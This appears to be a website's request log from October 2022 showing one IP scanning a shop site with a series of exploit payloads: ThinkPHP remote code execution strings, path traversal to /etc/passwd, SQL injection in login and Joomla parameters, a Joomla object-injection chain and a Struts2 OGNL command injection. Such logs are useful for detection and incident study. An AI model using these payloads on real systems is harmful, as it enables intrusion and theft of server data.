| time |
PFID |
IP |
controller |
view |
variable |
device |
url |
post |
get |
source |
sourceName |
type |
| 2022-10-03 21:08:03 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
|
[]
|
{"s":"\/index\/\\think\\app\/invokefunction","function":"call_user_func_array","vars":["assert",["phpinfo()"]]}
|
|
|
0
|
| 2022-10-03 21:08:05 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/index/\think\view\driver\php/display&content=
|
[]
|
{"s":"\/index\/\\think\\view\\driver\\php\/display","content":""}
|
|
|
0
|
| 2022-10-03 21:08:07 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
|
[]
|
{"s":"\/admin\/\\think\\app\/invokefunction","function":"call_user_func_array","vars":["phpinfo",["-1"]]}
|
|
|
0
|
| 2022-10-03 21:08:08 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=captcha&test=-1
|
{"_method":"__construct","filter":["phpinfo"],"method":"get","server":{"REQUEST_METHOD":"1"}}
|
{"s":"captcha","test":"-1"}
|
|
|
0
|
| 2022-10-03 21:08:11 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
|
[]
|
{"s":"\/admin\/\\think\\app\/invokefunction","function":"call_user_func_array","vars":["assert",["phpinfo()"]]}
|
|
|
0
|
| 2022-10-03 21:08:11 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=captcha&test=-1
|
{"_method":"__ConStruct","method":"get","filter":["call_user_func"],"get":["phpinfo"]}
|
{"s":"captcha","test":"-1"}
|
|
|
0
|
| 2022-10-03 21:08:13 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/admin/\think\view\driver\php/display&content=
|
[]
|
{"s":"\/admin\/\\think\\view\\driver\\php\/display","content":""}
|
|
|
0
|
| 2022-10-03 21:08:15 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=captcha&test=-1
|
{"_method":"__construct","filter":["phpinfo"],"method":"GET","get":["1"]}
|
{"s":"captcha","test":"-1"}
|
|
|
0
|
| 2022-10-03 21:08:15 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/api/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
|
[]
|
{"s":"\/api\/\\think\\app\/invokefunction","function":"call_user_func_array","vars":["phpinfo",["-1"]]}
|
|
|
0
|
| 2022-10-03 21:08:18 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/api/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
|
[]
|
{"s":"\/api\/\\think\\app\/invokefunction","function":"call_user_func_array","vars":["assert",["phpinfo()"]]}
|
|
|
0
|
| 2022-10-03 21:08:20 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=/api/\think\view\driver\php/display&content=
|
[]
|
{"s":"\/api\/\\think\\view\\driver\\php\/display","content":""}
|
|
|
0
|
| 2022-10-03 21:08:35 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=index/\think\Request/input&filter[]=phpinfo&data=-1
|
[]
|
{"s":"index\/\\think\\Request\/input","filter":["phpinfo"],"data":"-1"}
|
|
|
0
|
| 2022-10-03 21:08:38 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=index/\think\request/input?data[]=phpinfo()&filter=assert
|
[]
|
{"s":"index\/\\think\\request\/input?data[]=phpinfo()","filter":"assert"}
|
|
|
0
|
| 2022-10-03 21:08:40 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=admin/\think\Request/input&filter[]=phpinfo&data=-1
|
[]
|
{"s":"admin\/\\think\\Request\/input","filter":["phpinfo"],"data":"-1"}
|
|
|
0
|
| 2022-10-03 21:08:43 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=admin/\think\request/input?data[]=phpinfo()&filter=assert
|
[]
|
{"s":"admin\/\\think\\request\/input?data[]=phpinfo()","filter":"assert"}
|
|
|
0
|
| 2022-10-03 21:08:45 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=api/\think\Request/input&filter[]=phpinfo&data=-1
|
[]
|
{"s":"api\/\\think\\Request\/input","filter":["phpinfo"],"data":"-1"}
|
|
|
0
|
| 2022-10-03 21:08:49 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=api/\think\request/input?data[]=phpinfo()&filter=assert
|
[]
|
{"s":"api\/\\think\\request\/input?data[]=phpinfo()","filter":"assert"}
|
|
|
0
|
| 2022-10-03 21:09:29 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=index/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../../../../../../../../../../etc/passwd
|
[]
|
{"s":"index\/think\\\\Error\/appError","errno":"1","errstr":"1","errline":"1","errfile":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}
|
|
|
0
|
| 2022-10-03 21:09:31 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=admin/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../../../../../../../../../../etc/passwd
|
[]
|
{"s":"admin\/think\\\\Error\/appError","errno":"1","errstr":"1","errline":"1","errfile":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}
|
|
|
0
|
| 2022-10-03 21:09:33 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=manage/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../../../../../../../../../../etc/passwd
|
[]
|
{"s":"manage\/think\\\\Error\/appError","errno":"1","errstr":"1","errline":"1","errfile":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}
|
|
|
0
|
| 2022-10-03 21:09:36 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?s=api/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../../../../../../../../../../etc/passwd
|
[]
|
{"s":"api\/think\\\\Error\/appError","errno":"1","errstr":"1","errline":"1","errfile":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}
|
|
|
0
|
| 2022-10-03 21:10:26 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 21:29:25 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/index.php?m=member&f=login_save
|
{"username":"dd' or extractvalue(0x0a,concat(0x0a,926637018*994773834))#","password":"dd","submit":" \u00bc "}
|
{"m":"member","f":"login_save"}
|
|
|
0
|
| 2022-10-03 21:38:53 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 21:38:56 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
{"username":"\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0","{{token}}":"1","password":"AAA\";s:11:\"maonnalezzo\":O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"printf\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:43:\"http:\/\/RayTest.6666\/;ofewddotum%%ettljjwrjk\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}s:6:\"return\";s:102:","option":"com_users","task":"user.login","0":"1"}
|
[]
|
|
|
0
|
| 2022-10-03 21:51:02 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?q=node&destination=node
|
{"pass":"lol","form_build_id":"","form_id":"user_login_block","op":"Log in","name":["a"]}
|
{"q":"node","destination":"node"}
|
|
|
0
|
| 2022-10-03 21:51:57 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|
| 2022-10-03 21:53:02 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
|
[]
|
{"option":"com_contenthistory","view":"history","list":{"ordering":"","select":"updatexml(0x23,concat(1,md5(8888)),1)"},"item_id":"1","type_id":"1"}
|
|
|
0
|
| 2022-10-03 21:57:35 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D
|
[]
|
{"name":"%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat \/etc\/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','\/c',#cmd}:{'\/bin\/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"}
|
|
|
0
|
| 2022-10-03 22:00:48 |
0
|
180.138.61.183
|
|
|
|
desktop
|
https://mart.phantasia.tw/
|
[]
|
[]
|
|
|
0
|